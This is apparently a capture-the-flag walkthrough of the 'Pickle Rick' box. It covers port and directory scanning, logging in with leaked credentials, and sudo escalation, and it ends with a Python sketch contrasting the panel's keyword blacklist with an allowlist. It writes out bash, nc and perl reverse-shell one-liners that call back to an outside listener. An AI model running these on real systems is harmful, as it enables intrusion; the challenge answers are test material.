1. What is the first ingredient Rick needs?
Port scan
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -p 22,80,146,512,2045,2222 -A <ip>
Service:
- 22 OpenSSH 7.2p2
- 80 Apache/2.4.18
OS: Ubuntu
Vulnerable scan
nmap -p 22,80 --script vuln <ip>
Access HTTP site
View source. I found a username: “R1ckRul3s”
Inspect Element. Nothing useful.
Scan for directories with dirb
dirb http://<ip>/
Access robots.txt; nothing much except “Wubbalubbadubdub”.
Further directory scan with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
There’s a login.php
Access the login.php page
Login with R1ckRul3s:Wubbalubbadubdub
Success!!!
Let’s explore the other panels; nothing much useful.
Back to the command panel, let’s test it
whoami
It works. Now I can create a reverse shell.
Create listener
nc -lvp 1234
Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/<ip>/1234 0>&1
Failed!!! I don’t get any shell.
Try another command
nc -e /bin/sh <ip> 1234
Failed!!! I don’t get any shell. Seems like some filter is blocking these commands.
Let’s try the other way around: exploring files.
ls
cat Sup3rS3cretPickl3Ingred.txt
Failed!!!
Try another command
less Sup3rS3cretPickl3Ingred.txt
ANS: mr. meeseek hair
2. What’s the second ingredient Rick needs?
Read clue.txt
less clue.txt
Check if I can run sudo
sudo -l
I can run anything
ls -la /home
ls -la /home/rick
less /home/rick/'second ingredients'
ANS: 1 jerry tear
3. What’s the final ingredient Rick needs?
Since I can run sudo, I can access the root directory
sudo ls -la /root
sudo less /root/3rd.txt
4. Bonus for reverse shell
Since I can’t use these:
- bash
- nc
- python
Try perl
perl -e 'use Socket;$i="<ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Now I have a shell.
sudo su
Now I’m root.
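The weak point in this box is the keyword blacklist behind the command panel: it rejects bash, nc, python and cat, yet less and perl run unchanged. As an added example (not from the writeup, and not the box’s own PHP), here is a Python model of that blacklist beside an allowlist design that maps fixed panel actions to argv vectors and never hands user input to a shell; the BLOCKED_WORDS list and the ALLOWED_ACTIONS map are constructed to mirror what the writeup observed.

```python
import re
import subprocess
from typing import List, Optional

# Constructed to mirror the panel's observed behaviour: these words are
# rejected, anything else (less, perl, ...) is passed to the shell as typed.
BLOCKED_WORDS = ("bash", "nc", "python", "cat")


def blacklist_allows(cmd: str) -> bool:
    """The panel-style check: reject only if a blocked word appears."""
    return not any(re.search(rf"\b{w}\b", cmd) for w in BLOCKED_WORDS)


# Allowlist: each panel action is a fixed argv. The only free input is an
# optional filename, which must be a plain name (no '/', no leading '-',
# no shell metacharacters) so it can never become a path or an option.
ALLOWED_ACTIONS = {
    "whoami": ["whoami"],
    "list": ["ls", "-la"],
}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


def allowlist_argv(action: str, arg: str = "") -> Optional[List[str]]:
    """Return the argv to run, or None if the request is not on the allowlist."""
    if action not in ALLOWED_ACTIONS:
        return None
    argv = list(ALLOWED_ACTIONS[action])
    if arg:
        if not SAFE_NAME.match(arg):
            return None
        argv.append(arg)
    return argv


def run_allowlisted(action: str, arg: str = "") -> Optional[str]:
    """Execute an allowlisted action without a shell; None if rejected."""
    argv = allowlist_argv(action, arg)
    if argv is None:
        return None
    # shell=False: argv goes straight to execve, so ';', '|' and '$()' in
    # the filename would be rejected above rather than interpreted here.
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout
```

With the allowlist, a request like `list clue.txt; id` is refused outright instead of depending on which command names someone remembered to block.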